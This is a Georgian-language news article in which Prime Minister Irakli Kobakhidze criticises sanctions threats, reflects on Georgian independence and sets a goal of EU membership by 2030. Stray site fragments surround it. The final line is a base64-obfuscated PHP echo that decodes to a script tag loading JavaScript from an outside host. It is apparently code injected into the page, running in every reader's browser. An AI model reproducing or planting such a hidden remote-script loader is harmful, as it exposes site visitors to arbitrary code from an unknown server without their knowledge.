celsiusi
ავერსი შნაიდერი

 თუ პრინციპულობით და ენთუზიაზმით, ოღონდ პრაგმატულად ვიმოქმედებთ და არა ემოციურად, დარწმუნებული ვარ, ძალიან დიდ შედეგებს მივაღწევთ ჩვენი ქვეყნისთვის, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი კობახიძემ საზოგადოებრივ-პოლიტიკური თოქ-შოუების წამყვანებთან შეხვედრისას აღნიშნა.

მთავრობის მეთაურის თქმით, სანქციებით შანტაჟი და მუქარა ევროპულ და ამერიკულ მიდგომებს არ ესადაგება.

„დე-ფაქტო სანქცია უკვე მოქმედებს, კონკრეტულად ჩვენი პარტიის დამფუძნებლის, საპატიო თავმჯდომარის მიმართ. ასეთი რაღაცები ჩვენ ვიხილეთ უკვე, ძალიან სამწუხაროა, მაგრამ ეს არის პოლიტიკა. რა თქმა უნდა, ეს ძალიან არაევროპულია, არაამერიკულია, არ მიესადაგება ევროპულობას და ამერიკულობას, მაგრამ პოლიტიკაა და საქართველოშიც.

სამწუხაროდ ბევრი სიბინძურეა ქართულ პოლიტიკაში, ვხედავთ, რომ ქართული, ევროპული და ამერიკულიც დიდად არაფერ შუაშია. პოლიტიკა, როგორც ამბობენ, არის საკმაოდ სიბინძურით დატვირთული საქმე და დიდი პოლიტიკა არის დიდი სიბინძურით დატვირთული საქმე. სამწუხაროდ, ეს ასეა. ამიტომ, ასეთი რაღაცები არის - მუქარა, შანტაჟი და ა.შ მაგრამ, სადაც მართალი ხარ, სადაც მიდიხარ წინ ღირსებით, სადაც იცავ ქვეყნის ინტერესებს, დამოუკიდებლობას, სუვერენიტეტს, იქ აუცილებლად მიაღწევ შედეგს. ჩვენ ვართ ცოტა უცნაური ხალხი ამ სიტყვის საუკეთესო გაგებით. 80-იანი წლების ბოლოს ქართველი ხალხი გამოვიდა და დაუპირისპირდა საბჭოთა კავშირს. მაშინ ვერავის წარმოედგინა, რომ საბჭოთა კავშირი შეიძლებოდა დაშლილიყო, რაც მოხდა რამდენიმე წელიწადში. მაგრამ, მაგალითად, 1988 წელს ეს რეალურად ვერავის წარმოედგინა, მაგრამ ქართველი ხალხი გამოვიდა, მოითხოვა დამოუკიდებლობა, რა თქმა უნდა, ამას დაერთო გლობალური პროცესები, მაგრამ საბოლოო ჯამში, რაც ყველას ეგონა წარმოუდგენელი, ამას მიაღწია ხალხმა, ეს არის საქართველოს ეროვნული დამოუკიდებლობის აღდგენა. თუ ასეთი პრინციპულობით და ენთუზიაზმით, ოღონდ პრაგმატულად ვიმოქმედებთ და არა ემოციურად, დარწმუნებული ვარ, ძალიან დიდ შედეგებს მივაღწევთ ჩვენი ქვეყნისთვის.

მთავარი შედეგი, რაზეც ვართ ორიენტირებული, არის ევროკავშირის წევრობა და 2030 წლისთვის თუ რომელიმე კანდიდატი ქვეყანა იქნება ევროკავშირში გაწევრიანებისთვის მზად, პირველი სწორედ საქართველო იქნება", - განაცხადა

143
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");